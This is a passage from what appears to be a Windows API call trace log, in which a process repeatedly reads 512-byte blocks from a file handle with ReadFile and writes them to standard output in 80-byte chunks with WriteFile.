lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.815] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.815] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.816] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.817] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] 
GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 
[0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.818] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.818] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.819] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.819] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType 
(hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.820] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.820] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.820] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, 
lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.821] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.821] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 
[0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, 
lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.822] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.822] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.823] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.823] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, 
